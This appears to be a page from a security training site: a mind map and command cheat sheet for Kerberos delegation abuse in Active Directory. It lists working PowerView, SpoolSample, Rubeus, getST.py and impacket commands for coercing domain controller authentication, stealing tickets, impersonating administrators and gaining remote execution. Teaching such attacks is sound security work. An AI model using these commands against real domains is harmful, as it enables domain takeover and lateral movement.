Dashboard > Mind Maps > Delegation Attack Paths

Delegation Attack Paths

Kerberos delegation abuse

Constrained & Unconstrained Delegation

Tip: Click on any node to see related information!

MAP Interactive Mind Map

graph TD A[Find Delegation] --> B{Delegation Type} B --> C[Unconstrained] B --> D[Constrained] B --> E[Resource-Based RBCD] C --> F[Coerce DC Auth] F --> G[PrinterBug/PetitPotam] G --> H[Capture DC TGT] H --> I[DCSync] D --> J[Request Ticket as Admin] J --> K[getST.py impersonate] K --> L[Access Target Service] E --> M[Need Write on Target] M --> N[Add RBCD Delegation] N --> K

MODULES Related Modules

Constrained & Unconstrained Delegation

Abusing Kerberos delegation for privilege escalation and lateral movement....

Active Directory

REF Quick Reference

Find Delegation

# Unconstrained
Get-DomainComputer -Unconstrained # Find unconstrained delegation
# Constrained
Get-DomainUser -TrustedToAuth # Find constrained delegation (users)
Get-DomainComputer -TrustedToAuth # Find constrained delegation (computers)

Unconstrained Delegation

# Coerce auth (PrinterBug)
SpoolSample.exe DC attacker-machine # Trigger auth from DC
# Capture TGT with Rubeus
Rubeus.exe monitor /interval:1 # Monitor for TGTs
# Use DC TGT
Rubeus.exe ptt /ticket:base64ticket # Pass-the-Ticket

Constrained Delegation

# Request service ticket
getST.py -spn cifs/target -impersonate administrator domain/user:pass # Abuse constrained delegation
export KRB5CCNAME=admin.ccache # Set ticket
impacket-psexec -k -no-pass target # Auth with ticket

Resource-Based (RBCD)

# Need GenericWrite on target
impacket-rbcd domain/user:pass -action write -delegate-to TARGET$ -delegate-from YOURPC$ # Configure RBCD
getST.py -spn cifs/target -impersonate admin domain/yourpc$:pass # Abuse RBCD to impersonate admin
Back to Mind Maps View Full Module